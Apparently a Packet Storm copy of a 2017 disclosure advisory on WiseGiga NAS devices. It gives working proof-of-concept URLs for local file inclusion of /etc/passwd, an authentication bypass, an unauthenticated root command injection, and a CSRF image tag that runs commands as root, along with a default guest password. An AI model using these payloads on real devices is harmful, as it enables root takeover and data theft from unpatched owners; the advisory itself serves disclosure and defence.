Exploit the possiblities

WiseGiga NAS CSRF / LFI / Command Execution

WiseGiga NAS CSRF / LFI / Command Execution
Posted Sep 11, 2017
Authored by Pierre Kim

WiseGiga NAS suffers from cross site request forgery, local file inclusion, command execution, and default credential vulnerabilities.

tags | exploit, local, vulnerability, file inclusion, csrf
MD5 | 047939def71293ad9bd51f3067e33736

WiseGiga NAS CSRF / LFI / Command Execution

Change Mirror Download
Source: https://blogs.securiteam.com/index.php/archives/3402

Vulnerabilities summary
The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices.

WiseGiga is a Korean company selling NAS products.

The vulnerabilities found in WiseGiga NAS are:

Pre-Authentication Local File Inclusion (4 different vulnerabilities)
Post-Authentication Local File Inclusion
Remote Command Execution as root
Remote Command Execution as root with CSRF
Info Leak
Default accounts


Credit
An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program


Vendor response
We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.


Vulnerabilities details

Pre-Authentication Local File Inclusion
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).

By sending GET request to the following URIas with filename= as a parameter, an attacker can trigger the vulnerabilities:

/webfolder/download_file1.php
down_data.php
download_file.php
mobile/download_file1.php


Proof of Concept
http://IP/webfolder/download_file1.php?filename=/etc/passwd
http://IP/down_data.php?filename=/etc/passwd
http://IP/download_file.php?filename=base64(/etc/passwd)
http://IP/mobile/download_file1.php?filename=base64(/etc/passwd)

Post-Authentication Local File Inclusion
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).

By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability.


Proof of Concept
http://IP//mobile/download_file2.php?filename=base64(/etc/passwd)


Remote Command Execution as root
The WiseGiga NAS firmware contain pre.php files in the different directories.

For example:
/app_data/apache/htdocs/auto/pre.php
/app_data/apache/htdocs/admin/iframe/pre.php
/app_data/apache/htdocs/admin/pre.php
/app_data/apache/htdocs/mobile/pre.php
/app_data/apache/htdocs/wiseapp/config/pre.php
/app_data/apache/htdocs/pre.php
/home/htdocs/webfolder/pre.php
/ub/update/init/pre.php
/tmp/home/root/htdocs/auto/pre.php
/tmp/home/root/htdocs/pre.php


A astandarda pre.php contains:

181 [...]
182 function auth()
183 {
184 global $memberid;
185 session_start();
186 //echo $memberid;
187 if($memberid=="root")
188 {
189 // print<<<__DATA_OF_HTML__
190 //<script language="JavaScript">
191 // alert("sucess !");
192 //</script>
193 //__DATA_OF_HTML__;
194 }
195 else
196 {
197 print<<<__DATA_OF_HTML__
198 <script language="JavaScript">
199 alert("\xc0\xce\xc1\xf5\xb9\xde\xc1\xf6 \xbe\xca\xc0\xba \xbb\xe7\xbf\xeb\xc0\xda\xc0\xd4\xb4\xcf\xb4\xd9!");
200 // location.href='/admin/';
201 window.open('index.php','_parent');
202 exit;
203 </script>
204 __DATA_OF_HTML__;
205 }
206
207 }


Using global $memberid (line 184), the attacker can override the authentication, by specifying a valid user (aroota) inside the HTTP request:

GET /webpage[...]?memberid=root&[...] HTTP/1.0


The pre.php files also contains a function called root_exec_cmd() that is a wrapper to popen():

23 function root_exec_cmd($cmd)
24 {
25 $tmpfile=fopen("/tmp/ramdisk/cmd.list","w");
26 fwrite($tmpfile,$cmd);
27 fclose($tmpfile);
28 popen("/tmp/ramdisk/ramush","r");
29 }

By sending a GET request to root_exec_cmd() with user controlled $cmd variable input an attacker can execute arbitrary commands

The WiseGiga NAS runas the Apache server as root (uid=0 with gid=48 aapachea) hence the commands will execute as root.


Proof of Concept
By sending GET request to /admin/group.php with parameter ?cmd=add the WiseGiga NAS will call the add_system() function:

178 if($cmd == "add")
179 {
180 add_system();
181 }

The add_system() function uses global for $group_name and $user_data.

Then it will pass the user controlled input and will run it as root:

145 function add_system()
146 {
147 global $group_name,$user_data;
148
149 if(add_conf()==1)
150 {
151 //====================================================================================
152 root_exec_cmd("addgroup $group_name");


An attacker can get unauthenticated RCE as root by sending the following request:

http://IP/admin/group.php?memberid=root&cmd=add&group_name=d;id%20>%20/tmp/a

The file /tmp/a will contain:

uid=0(root) gid=48(apache) groups=48(apache)


Remote Command Execution as root with CSRF
There is no CSRF protection in WiseGiga NAS.

An attacker can force the execution of a command as root when the victim visits the malicious website.


Proof of Concept
Once the victim visit the attackeras website with the following code, the attacker can execute arbitrary commands.

<img src="http://192.168.1.1/admin/group.php?memberid=root&cmd=add&group_name=d;COMMANDTOEXECUTE">


InfoLeak
accessing http://IP/webfolder/config/config.php will disclose the PHP configuration.


Default accounts
Username: guest
Password: guest09#$

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close